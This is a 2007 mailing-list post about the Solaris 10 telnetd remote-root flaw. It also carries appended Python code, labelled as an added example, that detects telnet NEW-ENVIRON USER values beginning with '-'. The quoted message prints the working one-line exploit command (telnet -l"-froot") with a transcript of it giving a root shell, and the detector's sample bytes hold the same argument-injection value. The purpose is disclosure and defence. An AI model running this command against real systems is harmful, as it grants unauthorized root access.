[rescue] Solaris 10 Remote-Root Exploit
Bryan Gurney
arb_npx42 at comcast.net
Mon Feb 12 17:10:52 CST 2007
On Mon, 12 Feb 2007 08:45:40 -0500, Jonathan C. Patschke
<jp at celestrion.net> wrote:
> Just saw this on Slashdot:
>
> http://riosec.com/solaris-telnet-0-day
>
> And verified that it works:
>
> [jp at cobra:~]$ telnet -l"-froot" lic4
> Trying 10.10.100.120...
> Connected to lic4.centtech.com.
> Escape character is '^]'.
> Last login: Wed Jan 17 16:53:28 from hal10.centtech.
> Sun Microsystems Inc. SunOS 5.10 Generic January 2005
> You have mail.
> # Connection closed by foreign host.
> [jp at cobra:~]$ exit
> Connection to cobra.centtech.com closed.
>
> If you have any public-facing systems running Solaris's telnetd, you
> should disable it now. Even turning off remote root logins is
> insufficient, since this seems to bypass PAM.
>
http://the_archvile.shackspace.com/20061216_desktop_solarisomg.jpg
Now I'm very glad I selected "No".
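
Added example, not part of the original thread: a Python check that pulls the USER variable out of telnet NEW-ENVIRON suboptions (RFC 1572) in captured client-to-server bytes and flags values beginning with "-", the shape of the login name in the session quoted above. It assumes the client's -l value is sent as the NEW-ENVIRON USER variable; the function names are hypothetical and the sample bytes are constructed.

```python
# Added example (not from the thread): flag telnet NEW-ENVIRON USER values
# that start with "-", the shape of the login name in the quoted session.
IAC, SB, SE, NEW_ENVIRON = 255, 250, 240, 39   # RFC 854 / RFC 1572
IS, INFO, VAR, VALUE, ESC, USERVAR = 0, 2, 0, 1, 2, 3

def suboptions(stream):
    """Yield (option, payload) for each complete IAC SB ... IAC SE block."""
    i = 0
    while i < len(stream) - 2:
        if stream[i] == IAC and stream[i + 1] == SB:
            opt, j, payload = stream[i + 2], i + 3, bytearray()
            while j < len(stream) - 1:
                if stream[j] == IAC and stream[j + 1] == SE:
                    yield opt, bytes(payload)
                    break
                payload.append(stream[j])
                j += 2 if stream[j] == IAC else 1   # IAC IAC is a literal 0xff
            i = j + 2
        else:
            i += 2 if stream[i] == IAC and stream[i + 1] == IAC else 1

def environ_vars(payload):
    """Decode an IS/INFO payload into {name: value}; ESC quotes one byte."""
    if not payload or payload[0] not in (IS, INFO):
        return {}
    pairs, name, value, target = {}, bytearray(), bytearray(), None
    it = iter(payload[1:])
    for b in it:
        if b in (VAR, USERVAR):
            if target is not None:          # flush the previous pair
                pairs[name.decode("latin-1")] = value.decode("latin-1")
            name, value = bytearray(), bytearray()
            target = name
        elif b == VALUE:
            target = value
        elif target is not None:
            target.append(next(it, 0) if b == ESC else b)
    if target is not None:
        pairs[name.decode("latin-1")] = value.decode("latin-1")
    return pairs

def suspicious_users(stream):
    """Return USER values that login would see as an option, not a name."""
    return [u for opt, p in suboptions(stream) if opt == NEW_ENVIRON
            for u in [environ_vars(p).get("USER", "")] if u.startswith("-")]

def env_is(user):
    """Build a constructed NEW-ENVIRON IS suboption carrying USER=<user>."""
    return (bytes([IAC, SB, NEW_ENVIRON, IS, VAR]) + b"USER"
            + bytes([VALUE]) + user + bytes([IAC, SE]))

SAMPLE = env_is(b"-froot")   # constructed bytes, not a real capture
```
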